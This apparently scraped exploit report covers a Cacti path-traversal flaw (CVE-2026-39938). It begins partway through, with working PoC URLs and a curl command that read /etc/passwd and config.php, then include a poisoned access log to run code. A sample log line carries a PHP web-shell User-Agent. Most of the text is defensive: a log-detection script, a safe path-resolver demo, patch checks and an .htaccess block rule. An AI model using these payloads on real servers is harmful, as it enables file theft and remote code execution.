## https://sploitus.com/exploit?id=C1779145-9574-5457-B610-1891430BF6B2
# CVE-2026-39938: Cacti "
```

#### 3.2 Execute the Code by Including the Log File
```bash
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log"
```

**Result:** The poisoned log line is evaluated as PHP on inclusion, so the output of the injected command (e.g., `uid=33(www-data)`) appears in the response body.

---

## Common Endpoints Tested

| Endpoint | Parameter | Payload Example |
|----------|-----------|-----------------|
| `/graph_image.php` | `graph_theme` | `../../../../../../../etc/passwd` |
| `/graph_image.php` | `graph_theme` | `../../../../include/config.php` |
| `/graph_image.php` | `graph_theme` | `../../../../../../../var/log/apache2/access.log` |

---

## PoC URL Examples

### Basic LFI Test
```
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd
```

### Read Application Config
```
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php
```

### Log Poisoning (Injection)
```
http://target-cacti/graph_image.php?local_graph_id=1
```
With Header: `User-Agent: `

### Log Poisoning (Execution)
```
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log
```
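Both halves of the chain above leave a distinct footprint in the web server's own access log: a `graph_theme` value containing `..` or a path separator, and a PHP open tag inside a logged header. The following is an added detection example (not part of the original report or of Cacti); it parses Apache combined-format lines, decodes percent-encoding before matching so `%2f` variants are not missed, and correlates source IPs that did both, which is the complete poison-then-include sequence. The log lines are constructed for the demo and are not real traffic.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache "combined" log lines for the demo (not real traffic).
# Line 1 is benign; 2 and 3 read files via graph_theme (3 is percent-encoded);
# 4 plants PHP in the User-Agent; 5 includes the access log to execute it.
SAMPLE_LOG = r"""
10.0.0.5 - - [27/Jun/2026:10:00:01 +0000] "GET /cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=modern HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Jun/2026:10:00:07 +0000] "GET /cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "curl/8.5.0"
10.0.0.9 - - [27/Jun/2026:10:00:12 +0000] "GET /cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=..%2f..%2f..%2f..%2finclude%2fconfig.php HTTP/1.1" 200 2210 "-" "curl/8.5.0"
10.0.0.9 - - [27/Jun/2026:10:00:20 +0000] "GET /cacti/graph_image.php?local_graph_id=1 HTTP/1.1" 302 0 "-" "<?php system($_GET['c']); ?>"
10.0.0.9 - - [27/Jun/2026:10:00:25 +0000] "GET /cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log&c=id HTTP/1.1" 200 99321 "-" "curl/8.5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TRAVERSAL = re.compile(r'\.\.|[/\\]')          # dot-dot or any path separator
PHP_TAG = re.compile(r'<\?(?:php|=)', re.IGNORECASE)


def _deep_unquote(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded probes are not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_line(line):
    """Return {'ip', 'ts', 'findings': [(kind, evidence), ...]} or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    url = urlsplit(m.group('url'))
    if url.path.endswith('/graph_image.php'):
        # parse_qs removes one layer of percent-encoding; decode further for probes.
        for value in parse_qs(url.query, keep_blank_values=True).get('graph_theme', []):
            decoded = _deep_unquote(value)
            if TRAVERSAL.search(decoded):
                findings.append(('traversal', decoded))
    # A PHP open tag in any logged header is a poisoning attempt, whatever the URL.
    for field in ('ua', 'referer'):
        if PHP_TAG.search(m.group(field)):
            findings.append(('log_poisoning', m.group(field)))
    return {'ip': m.group('ip'), 'ts': m.group('ts'), 'findings': findings}


def scan(log_text):
    """All parsed records that carry at least one finding, in log order."""
    return [rec for rec in map(analyse_line, log_text.strip().splitlines())
            if rec and rec['findings']]


def correlate(alerts):
    """Source IPs that both poisoned the log and traversed to a file: the full chain."""
    kinds_by_ip = {}
    for rec in alerts:
        kinds_by_ip.setdefault(rec['ip'], set()).update(k for k, _ in rec['findings'])
    return sorted(ip for ip, kinds in kinds_by_ip.items()
                  if {'traversal', 'log_poisoning'} <= kinds)


if __name__ == '__main__':
    found = scan(SAMPLE_LOG)
    for rec in found:
        for kind, evidence in rec['findings']:
            print(f"{rec['ts']} {rec['ip']} {kind}: {evidence}")
    print('full chain from:', correlate(found))
```

Run it against a real `access.log` by passing the file contents to `scan()`. The correlation step is the useful signal: a lone traversal hit may be a scanner, but the same source writing a PHP tag into a header and then requesting that log through `graph_theme` is the exploit sequence described in this report.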

---

## Remediation

### Update to Patched Version
```bash
cd /var/www/html/cacti
git fetch --tags
git checkout tags/release/1.2.31
```

### Verify Patch Applied
```bash
grep -A 5 "if (isset(\$graph_data_array\['graph_theme'\]))" lib/rrd.php | grep basename
```
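The check above looks for `basename()` being applied to `graph_theme`, which strips every directory component from the value. The following is an added example, written in Python rather than PHP and not Cacti's own code, that models the bug class beside the hardened form: it assumes the theme name is joined directly onto a theme directory (an assumption about the vulnerable code, inferred from the PoC reading `/etc/passwd` with no suffix), and shows why `basename()` is best paired with an existence check inside that directory.

```python
import os
import tempfile

# Theme names are plain identifiers; anything else is rejected up front.
ALLOWED_CHARS = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-")


def resolve_theme_unsafe(theme_dir, theme):
    """The bug class from the page: the request value is joined straight into a path.
    Dot-dot segments walk out of theme_dir, and an absolute value makes os.path.join
    discard theme_dir altogether."""
    return os.path.normpath(os.path.join(theme_dir, theme))


def resolve_theme_safe(theme_dir, theme):
    """basename() plus an existence/containment check. Returns None on rejection."""
    # 1. basename() throws away every directory component, so "../../etc/passwd"
    #    and "/etc/passwd" both collapse to "passwd" (the step the patch grep
    #    looks for). Backslashes are normalised first so they cannot smuggle a path.
    name = os.path.basename(theme.replace("\\", "/"))
    if not name or name in (".", "..") or not set(name) <= ALLOWED_CHARS:
        return None
    # 2. Allowlist by existence: "passwd" is harmless only because no such theme
    #    exists, so require a real regular file inside theme_dir after symlink
    #    resolution rather than trusting the bare name.
    root = os.path.realpath(theme_dir)
    candidate = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, candidate]) != root or not os.path.isfile(candidate):
        return None
    return candidate


# Payloads from the PoC table on this page, plus a benign name and an unknown one.
PAYLOADS = (
    "modern",
    "../../../../../../../etc/passwd",
    "../../../../include/config.php",
    "/etc/passwd",
    "..\\..\\include\\config.php",
    "no-such-theme",
)


def demo():
    """Build a throwaway theme directory (constructed for the demo) and resolve
    every payload both ways. Returns {payload: (unsafe_path, safe_path_or_None)}."""
    with tempfile.TemporaryDirectory() as theme_dir:
        for name in ("classic", "modern"):
            with open(os.path.join(theme_dir, name), "w"):
                pass
        return {p: (resolve_theme_unsafe(theme_dir, p), resolve_theme_safe(theme_dir, p))
                for p in PAYLOADS}


if __name__ == "__main__":
    for payload, (unsafe, safe) in demo().items():
        print(f"{payload!r:40} unsafe -> {unsafe}")
        print(f"{'':40} safe   -> {safe}")
```

The unsafe resolver happily returns `/etc/passwd` for two different payloads; the safe one returns a path only for `modern`, which exists in the directory, and `None` for everything else, including the backslash variant and a well-formed name that simply is not installed.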

### Temporary Mitigation (.htaccess)
```apache
RewriteEngine On
# mod_rewrite matches QUERY_STRING raw (it is not URL-decoded), so a rule that
# only looks for a literal "../" is bypassed by "%2e%2e%2f". A valid theme name
# contains no dot, slash, backslash or percent sign, so reject all of them.
RewriteCond %{QUERY_STRING} (^|&)graph_theme=[^&]*(\.|/|\\|%) [NC]
RewriteRule ^graph_image\.php$ - [F,L]
```
This is a stop-gap only: it inspects the query string and nothing else, and it requires `AllowOverride` to permit `mod_rewrite` directives in `.htaccess`. Apply the patched release as soon as possible.

---

## References
- [GitHub Security Advisory](https://github.com/Cacti/cacti/security/advisories/GHSA-rm7p-qcqm-x5m6)
- [Patch Commit 9871f0c](https://github.com/Cacti/cacti/commit/9871f0cef9af285398d558c9b3188d5977e01a04)
- [NVD CVE-2026-39938](https://nvd.nist.gov/vuln/detail/CVE-2026-39938)

## W.P.E.F
- [W.P.E.F Telegram channel #1](https://t.me/wpef0)
- [W.P.E.F Telegram channel #2](https://t.me/wpef01)

---

*Report generated for security research purposes*
*Date: June 27, 2026*